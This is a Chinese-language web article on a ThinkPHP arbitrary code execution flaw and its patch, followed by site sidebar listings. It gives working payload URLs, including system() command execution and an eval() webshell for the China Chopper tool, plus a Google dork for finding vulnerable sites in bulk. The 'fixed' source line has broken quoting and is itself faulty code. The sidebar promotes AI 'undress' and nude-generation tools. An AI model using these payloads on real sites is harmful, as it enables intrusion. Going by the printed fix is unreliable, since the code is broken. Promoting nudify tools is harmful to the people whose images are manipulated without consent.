ThinkPHP框架任意代码执行漏洞的利用及其修复方法
ThinkPHP是国内著名的开源的PHP框架,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。早期的思想架构来源于Struts,后来经过不断改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结 构和MVC模式,融合了Struts的Action和Dao思想和JSP的TagLib(标签库)、RoR的ORM映射和ActiveRecord模式, 封装了CURD和一些常用操作,单一入口模式等,在模版引擎、缓存机制、认证机制和扩展性方面均有独特的表现.
然而近期thinkphp框架爆出了一个任意代码执行漏洞,其危害性相当的高,漏洞利用方法如下:
index.php/module/aciton/param1/${@print(THINK_VERSION)}
index.php/module/aciton/param1/${@function_all()}
其中的function_all代表任何函数,比如:
index.php/module/aciton/param1/${@phpinfo()}
就可以获取服务器的系统配置信息等。
index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al
可以列出网站文件列表
index.php/module/action/param1/{${eval($_POST[s])}}
就可以直接执行一句话代码,用菜刀直接连接.
这样黑客们就可以直接通过google批量搜索关键字:thinkphp intitle:系统发生错误 来获取更多使用thinkphp框架的网站列表。可见其危害性相当的大。
thinkphp框架执行任意代码漏洞修复方法:
用户可下载官方发布的补丁:
http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838
或者或者直接修改源码:
将/ThinkPHP/Lib/Core/Dispatcher.class.php文件中的
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
修改为:
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2';', implode($depr,$paths));
将preg_replace第二个参数中的双引号改为单引号,防止其中的php变量语法被解析执行。
注:本文仅供学习参考使用,请不要用于非法用途。
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
This Apple ID is not yet in use in the iTunes Store: Fix
Jun 10, 2024 pm 05:42 PM
When logging into iTunesStore using AppleID, this error saying "This AppleID has not been used in iTunesStore" may be thrown on the screen. There are no error messages to worry about, you can fix them by following these solution sets. Fix 1 – Change Shipping Address The main reason why this prompt appears in iTunes Store is that you don’t have the correct address in your AppleID profile. Step 1 – First, open iPhone Settings on your iPhone. Step 2 – AppleID should be on top of all other settings. So, open it. Step 3 – Once there, open the “Payment & Shipping” option. Step 4 – Verify your access using Face ID. step
How to fix red-eye on iPhone
Feb 23, 2024 pm 04:31 PM
So, you took some great photos at your last party, but unfortunately, most of the photos you took were of red eyes. The photo itself is great, but the red eyes in it kind of ruin the image. Not to mention, some of those party photos might be from your friends’ phones. Today we'll look at how to remove red eye from photos. What causes the red eyes in the photo? Red-eye often occurs when taking photos with flash. This is because the light from the flash shines directly into the back of the eye, causing the blood vessels under the eye to reflect the light, giving the effect of red eyes in the photo. Fortunately, with the continuous advancement of technology, some cameras are now equipped with red-eye correction functions that can effectively solve this problem. By using this feature, the camera takes pictures
How to solve the problem of Win11 failing to verify credentials?
Jan 30, 2024 pm 02:03 PM
When a Win11 user uses credentials to log in, he or she receives an error message stating that your credentials cannot be verified. What is going on? After the editor investigated this problem, I found that there may be several different situations that directly or indirectly cause this problem. Let's take a look with the editor.
An easy guide to fixing Windows 11 blue screen issues
Dec 27, 2023 pm 02:26 PM
Many friends always encounter blue screens when using computer operating systems. Even the latest win11 system cannot escape the fate of blue screens. Therefore, today I have brought you a tutorial on how to repair win11 blue screens. No matter whether you have encountered a blue screen or not, you can learn it first in case you need it. How to fix win11 blue screen method 1. If we encounter a blue screen, first restart the system and check whether it can start normally. 2. If it can start normally, right-click "Computer" on the desktop and select "Manage" 3. Then expand "System Tools" on the left side of the pop-up window and select "Event Viewer" 4. In the event viewer, we will You can see what specific problem caused the blue screen. 5. Then just follow the blue screen situation and events
Comprehensive Guide to PHP 500 Errors: Causes, Diagnosis and Fixes
Mar 22, 2024 pm 12:45 PM
A Comprehensive Guide to PHP 500 Errors: Causes, Diagnosis, and Fixes During PHP development, we often encounter errors with HTTP status code 500. This error is usually called "500InternalServerError", which means that some unknown errors occurred while processing the request on the server side. In this article, we will explore the common causes of PHP500 errors, how to diagnose them, and how to fix them, and provide specific code examples for reference. Common causes of 1.500 errors 1.
How to fix the volume cannot be adjusted in WIN10
Mar 27, 2024 pm 05:16 PM
1. Press win+r to open the run window, enter [regedit] and press Enter to open the registry editor. 2. In the opened registry editor, click to expand [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]. In the blank space on the right, right-click and select [New - String Value], and rename it to [systray.exe]. 3. Double-click to open systray.exe, modify its numerical data to [C:WindowsSystem32systray.exe], and click [OK] to save the settings.
Fix aksfridge.sys blue screen error in Windows 11/10
Feb 11, 2024 am 11:30 AM
If you encounter aksfridge.sys blue screen error after upgrading to Windows 11 or Windows 10, this article will provide you with solutions. You can try the following methods to successfully resolve this issue. The genuine aksfridge.sys file is the software component of AladdinHASP from AladdinKnowledgeSystems. AladdinHASP (Hardware Anti-Software Piracy) is a suite of digital rights management (DRM) protection and licensing software. Aksfridge.sys is a filter driver necessary for HASP to function properly. This component adds support for specialized external devices. Hardware Anti-Software Piracy, also known as AladdinHAS
How to fix the problem of being unable to access the Internet due to abnormal network card driver
Jan 06, 2024 pm 06:33 PM
Some friends find that their computers cannot access the Internet because of abnormal network card drivers. They want to know how to fix it. In fact, current systems have built-in driver repair functions, so we only need to manually update the driver. If it doesn’t work, then we can fix it. Driver software can be used. How to fix the problem that the network card driver is abnormal and cannot connect to the Internet: PS: If this problem occurs suddenly, you can try restarting the computer first. If it still doesn't work after restarting, continue with the following operations. Method 1: 1. First, right-click on the taskbar and select "Start Menu" 2. Open "Device Manager" in the right-click menu. 3. Click "Network Adapter", then select "Update Driver" and click "Automatically search for driver". After the update is completed, you can surf the Internet normally. 5. Some users are also affected by the problem.
